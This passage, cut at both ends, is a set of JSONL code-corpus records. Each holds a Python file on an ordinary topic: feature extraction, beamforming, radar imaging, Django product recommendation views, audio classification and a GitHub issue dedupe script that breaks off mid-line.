models.wide_resnet101_2(pretrained=False)\r\n model.fc = nn.Linear(2048, num_class)\r\n if(network == \"resnext\"):\r\n model = models.resnext101_32x8d(pretrained=False)\r\n model.fc = nn.Linear(2048, num_class)\r\n if(network == \"resnet152\"):\r\n model = models.resnet152(pretrained=False)\r\n model.fc = nn.Linear(2048, num_class)\r\n model.load_state_dict(torch.load(path))\r\n model.cuda()\r\n model.eval()\r\n\r\n model_cache.append(model)\r\nfrom data import _data_transforms\r\nfrom torchvision import datasets\r\n\r\n_, valid_transforms = _data_transforms(0)\r\ntrain_loader = torch.utils.data.DataLoader(\r\n datasets.ImageFolder('bird_dataset' + '/train_images',\r\n transform=valid_transforms),\r\n batch_size=1, shuffle=False, num_workers=1)\r\nval_loader = torch.utils.data.DataLoader(\r\n datasets.ImageFolder('bird_dataset' + '/val_images',\r\n transform=valid_transforms),\r\n batch_size=1, shuffle=False, num_workers=1)\r\n\r\nimport numpy as np\r\ndef extract_features(loader, model_cache):\r\n features = []\r\n targets = []\r\n for data, target in loader:\r\n targets.append(target.data.numpy())\r\n f = []\r\n for model in model_cache:\r\n f.append(model(data).cpu().data.numpy())\r\n f = np.array(f).flatten()\r\n features.append(f)\r\n return np.array(features), np.array(targets)\r\n\r\nf_train, t_train = extract_features(train_loader, model_cache)\r\n 
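\r\n# A possible next step (a sketch, not part of the original script): fit a simple\r\n# meta-classifier on the stacked model outputs, then score it on the validation set.\r\n# from sklearn.linear_model import LogisticRegression\r\n# meta = LogisticRegression(max_iter=1000)\r\n# meta.fit(f_train, t_train.ravel())\r\n# f_val, t_val = extract_features(val_loader, model_cache)\r\n# print(meta.score(f_val, t_val.ravel()))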
\r\n\r\n\r\n","sub_path":"extract_features.py","file_name":"extract_features.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"531184913","text":"f = open(\"JARGON.txt\", \"r\")\r\nwordList = f.read().split(\"\\n\")\r\nstop = \"XXX\"\r\nchoice = '' #dummy value\r\nwhile choice != stop:\r\n    print(\"+++++++++++++++\\n1. Exact Match\\n2. Start of Term\\n3. Within Term\\n+++++++++++++++\")\r\n    choice = input(\"Choice? \")\r\n    if choice == \"1\" or choice == \"2\" or choice == \"3\":\r\n        term = input(\"Term? \")\r\n        if choice == \"1\":\r\n            count = 0\r\n            for word in wordList:\r\n                if word == term:\r\n                    count += 1\r\n                    print(word)\r\n            print(\"There were %d matching term(s)\" %count)\r\n            print()\r\n        elif choice == \"2\":\r\n            count = 0\r\n            for word in wordList:\r\n                if word != term and word.startswith(term) == True:\r\n                    count += 1\r\n                    print(word)\r\n            print(\"There were %d matching term(s)\" %count)\r\n            print()\r\n        elif choice == \"3\":\r\n            count = 0\r\n            for word in wordList:\r\n                if word != term and word.startswith(term) == False and term in word:\r\n                    count += 1\r\n                    print(word)\r\n            print(\"There were %d matching term(s)\" %count)\r\n            print()\r\n    elif choice != stop:\r\n        print(\"Invalid, try again.\")\r\n        print()\r\n","sub_path":"CTRevPrac1/CTRevPrac1_Q2.py","file_name":"CTRevPrac1_Q2.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"347802245","text":"#coding=utf-8\nfrom products.netReport.baseReport import BaseReport\nclass MemReport(BaseReport):\n    \"\"\"\n    Memory report\n    \"\"\"\n    def getMemPerfValues(self):\n        \"\"\"\n        Get Mem performance values\n        \"\"\"\n        memPerfDatas={}\n        for monitorObj in self.monitorObjs:\n            memPerfValue=self.getMonitorPerfDatas(monitorObj,\"Mem\",\"Mem\")\n            memPerfDatas[monitorObj]=memPerfValue\n        return memPerfDatas\n\n    def getReport(self):\n        \"\"\"\n        Mem report\n        \"\"\"\n        memPerfDatas=self.getMemPerfValues()\n        topTenMems=self.perfTop(memPerfDatas)\n        avgMemTrendValue=self.perfTrendReport(topTenMems)\n        avgMemTrendLineFilePath=self.rgh.makeMemTrendGraph(avgMemTrendValue,\"Average memory utilization trend\",\"avgMemTrendLineFilePath\")\n        [topTenMem.pop(\"datas\") for topTenMem in topTenMems]\n        return topTenMems,avgMemTrendLineFilePath\n    \n    \n    \n    ","sub_path":"products/netReport/memReport.py","file_name":"memReport.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"388735734","text":"url = \"http://www.pythonchallenge.com/pc/def/{}.html\"\n\noriginal = list(\"g fmnc wms bgblr rpylqjyrc gr zw fylb. rfyrq ufyr amknsrcpq ypc dmp. bmgle gr gl zw fylb gq glcddgagclr ylb rfyr'q ufw rfgq rcvr gq qm jmle. sqgle qrpgle.kyicrpylq() gq pcamkkclbcb. 
lmu ynnjw ml rfc spj.\")\n\nfor letter in original:\n if(letter==' '):\n print(' ', end='')\n continue\n print(chr(ord(letter)+2), end=\"\")\n\nprint(\"\\nAnswer Below:\")\n\nfinal = \"\"\nnew = list(\"map\")\nfor letter in new:\n final += chr(ord(letter) + 2)\nprint(url.format(final))","sub_path":"Problem_1/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"274469004","text":"import itertools\nimport keras\nimport keras.backend as K\nimport math\nimport numpy as np\nimport datetime\nimport time\n\n\nclass Model:\n \"\"\"\n This class wraps the process of beamforming with MVDR and subsystemms requried for MVDR.\n It loads a model from prespecified path, uses the outputs of the model\n to determine dominant source and uses the dominant sources in updating covariance\n matrices of both noise and speech. Covariance matrix of speech is used\n to estimate direction of incidence of sound from the main source.\n \"\"\"\n\n def __init__(self, n, frame_len, delay_and_sum, use_channels, model_name, choose=None):\n self.model_path = model_name\n self.mask_thresh_speech = 0.7\n self.mask_thresh_noise = 0.3\n self.num_of_mics = len(choose) if choose else n\n self.delay_and_sum = delay_and_sum # TO DO\n self.use_channels = use_channels # TO DO\n self.frame_len = frame_len\n self.psd_tracking_constant_speech = 0.95 + 0j\n self.psd_tracking_constant_noise = 0.99 + 0j\n self.choose = choose\n self.frame = 0\n self.fft_len = int(self.frame_len / 2 + 1)\n self.eigenvector = np.ones((self.fft_len, self.num_of_mics), dtype=np.complex64) +\\\n np.zeros((self.fft_len, self.num_of_mics), dtype=np.complex64) * 1j\n self.psd_speech = np.tile(np.diag(np.ones(self.num_of_mics)), (self.fft_len, 1)).reshape(-1, self.num_of_mics, self.num_of_mics).astype(np.complex64)\n self.psd_noise = np.tile(np.diag(np.ones(self.num_of_mics)), (self.fft_len, 1)).reshape(-1, self.num_of_mics, self.num_of_mics).astype(np.complex64)\n self.frequency = 16000\n self.speed_of_sound = 340\n self.doa = np.pi/2\n self.doa_ma = 0.8\n\n def fast_mvdr(self, sound):\n cminv = np.linalg.inv(self.psd_noise)\n conj = np.conj(self.eigenvector).reshape(self.fft_len, 1, -1)\n return (conj @ cminv @ sound.reshape(self.fft_len, -1, 1)) / (\n conj @ cminv @ self.eigenvector.reshape(self.fft_len, -1, 1))\n\n def update_psds(self, fft_vector, speech_mask, noise_mask):\n toUpd = speech_mask\n self.psd_speech[toUpd] = self.psd_tracking_constant_speech * self.psd_speech[toUpd] + \\\n (1 - self.psd_tracking_constant_speech) * \\\n np.einsum('...i,...j->...ij', fft_vector, fft_vector.conj())[toUpd]\n toUpd = noise_mask\n self.psd_noise[toUpd] = self.psd_tracking_constant_noise * self.psd_noise[toUpd] + \\\n (1 - self.psd_tracking_constant_noise) * \\\n np.einsum('...i,...j->...ij', fft_vector, fft_vector.conj())[toUpd]\n\n def update_ev_by_power_iteration(self):\n unnormalized_eigenvector = np.einsum('...ij,...j->...i', self.psd_speech, self.eigenvector, dtype=np.complex128)\n eigen_norm = np.sqrt((unnormalized_eigenvector * unnormalized_eigenvector.conj()).mean(1))\n self.eigenvector = unnormalized_eigenvector / eigen_norm[:,None]\n # self.eigenvector2 = np.linalg.eig(self.psd_speech)[0]\n\n def gcc_phat(self, sigl_fft, sigr_fft, max_delay, distance):\n \"\"\"\n Method for computing angle for a pair of microphones, used to localize the source.\n Not used in the main pipeline.\n \"\"\"\n sigr_fft_star = np.conj(sigr_fft)\n cc = sigl_fft * 
sigr_fft_star\r\n        cc_phat = cc / abs(cc)\r\n        r_phat = np.fft.irfft(cc_phat)[0:max_delay]\r\n        return np.abs(self.compute_angle(np.argmax(r_phat), distance))\r\n\r\n    def compute_angle(self, n, d):\r\n        return np.arccos((1 / self.frequency * self.speed_of_sound * n) / d)\r\n\r\n    def calc_angle(self, ffts):\r\n        ang = self.gcc_phat(ffts[0, :], ffts[2, :], 6, 0.12) + self.gcc_phat(ffts[0, :], ffts[2, :], 9, 0.18)\r\n        return ang/2\r\n\r\n    def initialize(self):\r\n        \"\"\"\r\n        Initialize the model - preload and perform some dry runs to reduce latency\r\n        \"\"\"\r\n        self.model = keras.models.load_model(self.model_path)\r\n        self.model._make_predict_function()\r\n        self.input = self.model.input\r\n        self.output = self.model.output\r\n        self.session = K.get_session()\r\n        # Three dry runs to compile this magical device\r\n        for i in range(3):\r\n            prep = np.random.random([self.num_of_mics, 1, self.fft_len]).astype(np.float32)\r\n            self.session.run(self.output,\r\n                             feed_dict={self.input: prep})\r\n\r\n\r\n    def process(self, ffts):\r\n        \"\"\"\r\n        Process the sample - accepts single time frame with multiple channels.\r\n        Returns beamformed signal. Uses LSTM masking as a part of beamforming process.\r\n        \"\"\"\r\n        if self.choose is not None:\r\n            ffts = ffts[:, self.choose]\r\n        prep = ffts.T.reshape(self.num_of_mics, 1, -1)\r\n        prep = np.abs(prep)\r\n        self.doa = self.doa_ma * self.doa + (1 - self.doa_ma) * self.calc_angle(ffts)\r\n        response = self.session.run(self.output,\r\n                                    feed_dict={self.input: prep})\r\n        vad_mask = np.transpose(response, [2, 0, 1])\r\n        vad_mean = vad_mask.mean((1,2))\r\n        speech_update = vad_mean > self.mask_thresh_speech\r\n        # print(speech_update.mean())\r\n        noise_update = vad_mean < self.mask_thresh_noise\r\n        # print(noise_update.mean())\r\n        self.update_psds(ffts, speech_update, noise_update)\r\n        self.update_ev_by_power_iteration()\r\n        result_fftd = self.fast_mvdr(vad_mask.reshape(self.fft_len, self.num_of_mics) ** 2 * ffts).astype(np.complex64)\r\n        return result_fftd.reshape(-1, 1)\r\n","sub_path":"mvdr_model.py","file_name":"mvdr_model.py","file_ext":"py","file_size_in_byte":5591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"170095076","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ndef get_pos(motion, name):\r\n    start_index = -1\r\n    curr = 0\r\n    for col in motion.columns:\r\n        if col == name:\r\n            start_index = curr\r\n            break\r\n        curr += 1\r\n    start_index += 4\r\n    ret = dict()\r\n    ret['Time (Seconds)'] = motion.iloc[3:, 1]\r\n    ret['Time (Seconds)'].index = range(len(ret['Time (Seconds)']))\r\n    ret['X'] = motion.iloc[3:, start_index]\r\n    ret['X'].index = range(len(ret['X']))\r\n    ret['Y'] = motion.iloc[3:, start_index + 1]\r\n    ret['Y'].index = range(len(ret['Y']))\r\n    ret['Z'] = motion.iloc[3:, start_index + 2]\r\n    ret['Z'].index = range(len(ret['Z']))\r\n    return ret\r\n\r\n\r\ndef MC_tkf_timestamp(scan_data, platform_pos, range_bins, corner_reflector_pos):\r\n    one_way_range = np.sqrt(np.sum(np.square(platform_pos - corner_reflector_pos[0]), axis=1))\r\n    first_value = one_way_range[0]\r\n    range_with_zeros = np.where(one_way_range == first_value, 0, one_way_range)\r\n    indices = np.nonzero(range_with_zeros)\r\n    # print(indices)\r\n    tkf_scan_num = indices[0][0]\r\n    return tkf_scan_num\r\n\r\n\r\n# finds the time stamp at which the drone takes off relative to the radar's timer\r\ndef RD_tkf_timestamp(scan_data, platform_pos, range_bins, corner_reflector_pos, scan_timestamps):\r\n    one_way_range = np.sqrt(np.sum(np.square(platform_pos - corner_reflector_pos[0]), axis=1))\r\n    first_value = one_way_range[0]\r\n    cr_first_rbin = np.argmin(np.abs(first_value 
- range_bins))\r\n num_scans = len(scan_data)\r\n for k in range(1, num_scans):\r\n current = scan_data[k, cr_first_rbin]\r\n previous = scan_data[k-1, cr_first_rbin]\r\n if np.abs(current - previous) > 4.5:\r\n return k\r\n\r\n\r\n# data align function (incomplete, nothing is there we just called our\r\n# functions here so the data align function doesnt throw an error)\r\ndef data_align(scan_data, platform_pos, range_bins, scan_timestamps, motion_timestamps, corner_reflector_pos):\r\n motion_change_time = MC_tkf_timestamp(scan_data, platform_pos, range_bins, corner_reflector_pos)\r\n radar_change_time = RD_tkf_timestamp(scan_data, platform_pos, range_bins, corner_reflector_pos, scan_timestamps)\r\n # print(data['scan_timestamps'])\r\n real_scan_times = scan_timestamps - scan_timestamps[0]\r\n # print(real_scan_times)\r\n tkf_motion_timestamp = motion_timestamps[motion_change_time]\r\n tkf_scan_timestamp = real_scan_times[radar_change_time]\r\n aligned_motion_times = motion_timestamps + (tkf_scan_timestamp - tkf_motion_timestamp)\r\n # print(tkf_scan_timestamp, tkf_motion_timestamp)\r\n # print(aligned_motion_times)\r\n return aligned_motion_times\r\n\r\n\r\ndef better_back_projection(data, resolution, xstart, xstop, ystart, ystop):\r\n fig = plt.figure()\r\n\r\n # Import the separate lists of data from the pickle file\r\n scan_data = data['scan_data']\r\n platform_pos = data['platform_pos'] # Create variable with all the platform positions\r\n platform_pos = np.asarray(platform_pos)\r\n range_bins = data['range_bins'] # Create variable with all of the range bins\r\n\r\n ret = np.zeros((int((xstop-xstart)/resolution), int((ystop-ystart)/resolution)), dtype=np.complex128)\r\n\r\n # Create variables (all of them are np arrays) that represent the x, y and z axis\r\n possible_x = np.linspace(xstart, xstop,\r\n num=int((xstop-xstart)/resolution))\r\n possible_y = np.linspace(ystart, ystop,\r\n num=int((ystop-ystart)/resolution))\r\n z_layer = np.zeros((int((xstop-xstart)/resolution), int((ystop-ystart)/resolution)))\r\n\r\n # Create an array of all possible points: Three layers, x, y, and z. 
z is always zero.\r\n points = np.meshgrid(possible_x, possible_y)\r\n points = np.asarray(points)\r\n points = np.stack((points[0], -points[1], z_layer))\r\n\r\n count = 0\r\n for pos in platform_pos:\r\n # Create another array of the same size, this time with the current position of the platform\r\n pos_x = [pos[0]] * int((xstop-xstart)/resolution)\r\n pos_y = [pos[1]] * int((ystop-ystart)/resolution)\r\n pos_z = np.zeros((int((xstop-xstart)/resolution), int((ystop-ystart)/resolution)))\r\n pos_z.fill(pos[2])\r\n posit = np.meshgrid(pos_x, pos_y)\r\n posit = np.asarray(posit)\r\n posit = np.stack((posit[0], posit[1], pos_z))\r\n\r\n # Create another array of the same size, with each value being the range from that point to the platform\r\n ranges = np.linalg.norm(np.subtract(points, posit), axis=0)\r\n\r\n # Add the value at the range for each point to the running total of values\r\n temp = ranges.flatten()\r\n results = np.reshape(np.interp(temp, range_bins[0], scan_data[count]), (int((xstop-xstart)/resolution),\r\n int((ystop-ystart)/resolution)))\r\n ret += results\r\n count += 1\r\n\r\n # Display the value\r\n plt.imshow(np.abs(ret))\r\n plt.show()\r\n plt.pause(5)\r\n return np.abs(ret)\r\n\r\n\r\n# diction = get_pos(data, \"LB_Marker\")\r\ndata['motion_timestamps'] = data_align(data['scan_data'], data['platform_pos'], data['range_bins'], data['scan_timestamps'],\r\n data['motion_timestamps'], data['corner_reflector_pos'])\r\n\r\nbetter_back_projection(data, 0.01, -3, 3, -3, 3)\r\n\r\n\r\n# print(diction['Time (Seconds)'])\r\n# print('\\n')\r\n# print(diction['X'])\r\n# print('\\n')\r\n# print(diction['Y'])\r\n# print('\\n')\r\n# print(diction['Z'])\r\n\r\n# extent=(left, right, bottom, top) - Changing axis, left right are min max X, bot top are min max Y.\r\n\r\nplt.imshow(np.abs(data['scan_data']),\r\n extent=(\r\n data['range_bins'][0, 0],\r\n data['range_bins'][0, -1],\r\n data['scan_timestamps'][-1] - data['scan_timestamps'][0],\r\n 0))\r\n \r\nplt.xlabel('Range (m)')\r\nplt.ylabel('Elapsed Time (s)')\r\n\r\nplt.plot(data['range_bins'][0], data['motion_timestamps'], 'r--')\r\n","sub_path":"raw_code/pulson440/otheralign.py","file_name":"otheralign.py","file_ext":"py","file_size_in_byte":5983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"470417462","text":"from rest_framework import permissions, decorators, exceptions, generics\nfrom utils import viewset, http_code\nfrom rest_framework import filters\nfrom utils.services import product as product_services\nfrom . import serializers, models, filters as product_filters\nfrom . 
import recommender\n\n\nclass ProductViewSet(viewset.BaseView):\n permission_classes = [\n permissions.AllowAny,\n ]\n serializer_classes = {\n \"item_create\": serializers.ItemCreateSerializer,\n \"item_info\": serializers.ItemInfoSerializer,\n }\n\n @decorators.action(\n methods=[\n \"POST\",\n ],\n detail=False,\n )\n def item_create(self, request):\n serializer = self.get_serializer(data=request.POST)\n print(request.POST.get(\"authors\"))\n try:\n serializer.is_valid(raise_exception=True)\n new_book = product_services.add_new_item(**serializer.validated_data)\n\n return self.get_response(data=new_book, error_code=http_code.HttpSuccess)\n\n except exceptions.ValidationError as e:\n return self.get_response(data=e.detail, error_code=e.status_code)\n\n @decorators.action(\n methods=[\n \"GET\",\n ],\n detail=False,\n )\n def item_info(self, request):\n\n book_id = request.GET.get(\"id\", None)\n print(book_id)\n try:\n from .models import Book\n\n book = Book.objects.get(uid=book_id)\n serializer = self.get_serializer(book)\n\n return self.get_response(\n data=serializer.data, error_code=http_code.HttpSuccess\n )\n\n except Exception as e:\n return self.get_response(data=str(e), error_code=500)\n\n\nclass PopularProduct(generics.ListAPIView):\n from rest_framework import pagination\n\n queryset = models.Book.objects.order_by(\"-rating_count\")\n serializer_class = serializers.ItemSerializer\n permission_classes = (permissions.AllowAny,)\n filter_backends = [\n filters.SearchFilter,\n product_filters.PriceFilter,\n product_filters.AuthorFilters,\n product_filters.CategoryFilter,\n product_filters.PublisherFilter,\n product_filters.RatingFilter,\n ]\n search_fields = [\"name\"]\n\n def list(self, request):\n from django.http import JsonResponse\n\n try:\n data = super().list(request).data\n # paginator = Paginator(data, 25)\n # print(data)\n return JsonResponse({\"data\": data, \"error_code\": 0})\n except Exception as e:\n print(f\"Exception while filtering: {e}\")\n return JsonResponse({\"data\": None, \"error_code\": 0})\n\n\n\nclass AuthorView(generics.ListAPIView):\n queryset = models.Author.objects.order_by(\"name\")\n serializer_class = serializers.AuthorSerializer\n permission_classes = (permissions.AllowAny,)\n filter_backends = []\n search_fields = [\"name\"]\n\n def list(self, request):\n from django.http import JsonResponse\n\n try:\n data = super().list(request).data\n\n # paginator = Paginator(data, 25)\n # print(data)\n return JsonResponse({\"data\": data, \"error_code\": 0})\n except Exception as e:\n print(f\"Exception while filtering: {e}\")\n return JsonResponse({\"data\": None, \"error_code\": 0})\n\n\n\nclass PublisherView(generics.ListAPIView):\n queryset = models.Book.objects.order_by(\"publisher\").values(\"publisher\").distinct()\n serializer_class = serializers.PublisherSerializer\n permission_classes = (permissions.AllowAny,)\n filter_backends = []\n search_fields = [\"name\"]\n\n def list(self, request):\n from django.http import JsonResponse\n\n try:\n data = super().list(request).data\n return JsonResponse({\"data\": data, \"error_code\": 0})\n except Exception as e:\n print(f\"Exception while filtering: {e}\")\n return JsonResponse({\"data\": None, \"error_code\": 0})\n\n\nclass RecommendProduct(generics.ListAPIView):\n from rest_framework import pagination\n\n queryset = models.Book.objects.all()\n serializer_class = serializers.ItemSerializer\n permission_classes = (permissions.AllowAny,)\n filter_backends = [filters.SearchFilter]\n search_fields = 
[\"name\"]\n # filter_backends = ()\n\n def list(self, request):\n from interaction.models import Interaction\n from product.models import Book\n from user_account.models import User\n\n try: \n user = request.GET.get('uid', None)\n\n user = User.objects.get(uid=user)\n\n except: \n return JsonResponse({\"data\": None, \"error_code\": 500})\n\n user_interaction = Interaction.objects.filter(user=user).order_by(\"-updated_at\")\n\n from django.http import JsonResponse\n print(user_interaction)\n # if len(user_interaction) <2 :\n # return JsonResponse({\"data\": None, \"error_code\": 0})\n\n rated_books = Book.objects.filter(\n uid__in=user_interaction.values_list(\"book__uid\")\n )\n\n categories = rated_books.values_list(\"categories\")\n\n # recommend_book = Book.objects.filter(categories__in=categories[:3]).exclude(\n # sku__in=rated_books\n # )\n\n recommend_book = Book.objects.exclude(\n uid__in=user_interaction.values_list(\"book__uid\")\n )\n\n recommend_book = recommend_book.exclude(\n rating_count__gte=50, rating_sum__lte=150\n )\n\n recommend_book = recommender.cf_filter(\n categories.values_list(\"categories__cf_index\", flat=True), recommend_book, 10\n )\n\n try:\n\n return JsonResponse(\n {\n \"data\": {\n \"recommended_books\": serializers.ItemSerializer(\n recommend_book, many=True\n ).data,\n \"rated_book\": serializers.ItemSerializer(\n rated_books, many=True\n ).data,\n },\n \"error_code\": 0,\n }\n )\n except Exception as e:\n print(f\"Exception while filtering: {e}\")\n return JsonResponse({\"data\": None, \"error_code\": 0})\n\n\nclass RecommendProductByIndex(generics.ListAPIView):\n from rest_framework import pagination\n\n queryset = models.Book.objects.all()\n serializer_class = serializers.ItemSerializer\n permission_classes = (permissions.AllowAny,)\n filter_backends = [filters.SearchFilter]\n search_fields = [\"name\"]\n # filter_backends = ()\n\n def list(self, request):\n # from interaction.models import Interaction\n # from product.models import Book\n from django.http import JsonResponse\n \n index_list = request.GET.get('index_list', '')\n index_list = list(map(int,index_list.split(',')))\n recommend_book = ','.join(map(str,recommender.cf_filter_by_sku(\n index_list, 10\n )))\n\n try:\n return JsonResponse(\n {\n \"data\": {\n \"sku_list\": recommend_book,\n },\n \"error_code\": 0,\n }\n )\n except Exception as e:\n print(f\"Exception while filtering: {e}\")\n return JsonResponse({\"data\": None, \"error_code\": 0})\nclass RelatedProduct(generics.ListAPIView):\n from rest_framework import pagination\n\n queryset = models.Book.objects.all()\n serializer_class = serializers.ItemSerializer\n permission_classes = (permissions.AllowAny,)\n filter_backends = [filters.SearchFilter, product_filters.ContentFilter]\n search_fields = [\"name\"]\n # filter_backends = ()\n\n def list(self, request):\n\n from django.http import JsonResponse\n\n try:\n\n data = super().list(request).data\n\n return JsonResponse({\"data\": data, \"error_code\": 0})\n except Exception as e:\n print(f\"Exception while filtering: {e}\")\n raise e\n return JsonResponse({\"data\": None, \"error_code\": 0})\n\n\nclass CategoryTree(generics.ListAPIView):\n queryset = models.Category.objects.all()\n serializer_class = serializers.CategorySerializer\n pagination_class = None\n\n def list(self, request):\n from django.http import JsonResponse\n\n data = super().list(request).data\n category_names = [d[\"name\"] for d in data]\n category_tree = {}\n for idx, category_name in enumerate(category_names):\n 
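# first pass: build an empty node for every category; a second pass below\n            # attaches each node to its parent's \"children\" list\n            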
category_tree[category_name] = {\"children\": [], \"uid\": data[idx][\"uid\"]}\n        for category in data:\n            if category[\"parent\"]:\n                category_tree[category[\"parent\"][\"name\"]][\"children\"].append(\n                    {category[\"name\"]: category_tree[category[\"name\"]]}\n                )\n        # print(category_tree)\n\n        response_data = {\"root\": category_tree[\"root\"]}\n\n        return JsonResponse({\"data\": response_data, \"error_code\": 0})\n","sub_path":"backend/product/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"495381871","text":"#!/bin/python\n\nimport re\nimport sys\n\nclass MakeHeadings():\n\tregEx = ['<h2 id=\"([^\"]*)\">([^<]*)</h2>',\n\t\t'<a name=\"([^\"]*)\">']\n\terrorString = 'error'\n\n\tdef openFile(self, fileName):\n\t\tf = open(fileName, 'r', encoding=\"utf8\")\n\t\tfileContent = f.read()\n\t\tf.close()\n\t\treturn fileContent\n\n\tdef getInput(self):\n\t\tif len(sys.argv) == 1:\n\t\t\treturn self.errorString\n\t\telse:\n\t\t\treturn sys.argv[1]\n\n\tdef parseReplaceHtml(self, fileName, technique):\n\t\tif fileName != self.errorString:\n\t\t\tcontents = self.openFile(fileName)\n\t\t\tresults = re.findall(self.regEx[technique], contents, re.DOTALL)\n\t\t\tfileContent = '<h2>Table of Contents</h2>\\n'\n\t\t\tfileContent += '<ul>\\n'\n\t\t\tfor result in results:\n\t\t\t\tif technique == 0:\n\t\t\t\t\tindexTwo = 1\n\t\t\t\telse:\n\t\t\t\t\tindexTwo = 0\n\t\t\t\tfileContent += \"\\t<li>\" + result[indexTwo] + \"</li>\\n\"\n\t\t\tfileContent += '</ul>
\\n'\n\t\t\treturn fileContent\n\t\telse:\n\t\t\treturn 'pass in the name of the file you want to parse'\n\n\t# Not finished\n\tdef parseReplaceMarkdown(self, fileName):\n\t\tif fileName != self.errorString:\n\t\t\tcontents = self.openFile(fileName)\n\t\t\tresults = re.findall(self.regEx[1], contents, re.DOTALL)\n\t\t\tfileContent = '## Table of Contents\\n'\n\t\t\tfor result in results:\n\t\t\t\tfileContent += '[' + result[0] + '](#' + result[0] + \"]\"\n\t\t\treturn fileContent\n\t\telse:\n\t\t\treturn 'pass in the name of the file you want to parse'\n\n\tdef foo(self):\n\t\tprint(\"Barfoo\")\n\ndef bar(fileName):\n\tp = MakeHeadings()\n\treturn p.parseReplaceHtml(fileName, 0);\n\nprint(bar('PhoneGap.html'))\n#p = MakeHeadings()\n#p.foo()\n#p.parseReplace()\n","sub_path":"JavaScript/SystemCalls/PythonCall/python/MakeHeadings.py","file_name":"MakeHeadings.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"260666614","text":"\r\nfrom keras.models import load_model\r\nfrom python_speech_features import mfcc\r\nfrom scipy.io import wavfile\r\nfrom sklearn.metrics import accuracy_score\r\nfrom tqdm import tqdm\r\nimport numpy as np\r\nimport pandas as pd\r\nimport os\r\nimport pickle\r\n\r\n# gets rid of warning about unused cpu instructions\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\r\n\r\ndef build_predictions(audio_path):\r\n y_true = list()\r\n y_pred = list()\r\n file_name_prob = dict()\r\n\r\n print(\"Extracting features from audio\")\r\n for file in tqdm(os.listdir(audio_path)):\r\n rate, wav = wavfile.read(os.path.join(audio_path, file))\r\n label = file_2_class[file]\r\n class_index = classes.index(label)\r\n y_prob = list()\r\n for index in range(0, wav.shape[0]-config.step, config.step):\r\n sample = wav[index:index+config.step]\r\n x = mfcc(sample, rate, numcep=config.features, nfilt=config.filters, \r\n nfft=config.fourier_transforms)\r\n x = (x-config.min)/(config.max-config.min)\r\n if config.mode == \"cnn\":\r\n x = x.reshape(1, x.shape[0], x.shape[1], 1)\r\n elif config.mode == \"time\":\r\n x = np.expand_dims(x, axis=0)\r\n y_hat = model.predict(x)\r\n y_prob.append(y_hat)\r\n y_pred.append(np.argmax(y_hat))\r\n y_true.append(class_index)\r\n file_name_prob[file] = np.mean(y_prob, axis=0).flatten()\r\n \r\n return y_true, y_pred, file_name_prob\r\n\r\ndata_frame = pd.read_csv(\"cries.csv\")\r\nclasses = list(np.unique(data_frame.label))\r\nfile_2_class = dict(zip(data_frame.fname, data_frame.label))\r\npickle_path = os.path.join(\"pickles\", \"cnn.p\")\r\n\r\nwith open(pickle_path, \"rb\") as handle:\r\n config = pickle.load(handle)\r\n\r\nmodel = load_model(config.model_path)\r\n\r\ny_true, y_pred, file_name_prob = build_predictions(\"clean\")\r\naccuracy = accuracy_score(y_true=y_true, y_pred=y_pred)\r\n\r\ny_probs = list()\r\nfor index, row in data_frame.iterrows():\r\n y_prob = file_name_prob[row.fname]\r\n y_probs.append(y_prob)\r\n for c, p in zip(classes, y_prob):\r\n data_frame.at[index, c] = p\r\n\r\ny_pred = [classes[np.argmax(y)] for y in y_probs]\r\ndata_frame[\"y_pred\"] = y_pred\r\ndata_frame.to_csv(\"prediction.csv\", index=False)\r\n","sub_path":"audio-classification/prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":2262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"282348818","text":"#!/usr/bin/env python\n\nimport json\n\nfrom pprint import pprint\n# ratio = 
fw_fuzz.ratio(cr, k)\nfrom fuzzywuzzy import fuzz\nfrom textblob import TextBlob\n\nfrom utils.elastic import raw_es_sql_query\nfrom utils.webscraper import GithubWebScraper\n\ngws = GithubWebScraper(cachedir='/data/ssd/github_dashboard')\nansible_summaries = gws.get_issue_summaries('https://github.com/ansible/ansible')\ncore_summaries = gws.get_issue_summaries('https://github.com/ansible/ansible-modules-core')\nextras_summaries = gws.get_issue_summaries('https://github.com/ansible/ansible-modules-extras')\n\n\ncolumns = 'github_url,github_repo,github_number,state,merged,title'\nqs = 'SELECT %s FROM github' % columns\nresults = raw_es_sql_query(qs, scroll=True)\n\ntitles = [x['_source']['title'] for x in results['hits']['hits']]\ntitles = sorted(set(titles))\nhits = [x for x in results['hits']['hits']]\n\n\n'''\nfor hit in hits:\n number = hit['_source']['github_number']\n state = hit['_source']['state']\n\n summary = None\n if hit['_source']['github_repo'] == 'ansible':\n summary = ansible_summaries.get(str(number))\n elif hit['_source']['github_repo'] == 'ansible-modules-core':\n summary = core_summaries.get(str(number))\n elif hit['_source']['github_repo'] == 'ansible-modules-extras':\n summary = extras_summaries.get(str(number))\n\n if state != summary.get('state'):\n import epdb; epdb.st()\nsys.exit(1)\n'''\n\n#DUPES = []\n\n'''\nfor idx,title in enumerate(titles):\n print idx\n matches = [x for x in hits if x['_source']['title'] == title]\n\n if len(matches) > 1:\n\n mstates = sorted(set([x['_source']['state'] for x in matches]))\n if mstates == ['closed']:\n continue\n\n apts = [x for x in matches if x['_source']['github_repo'] == 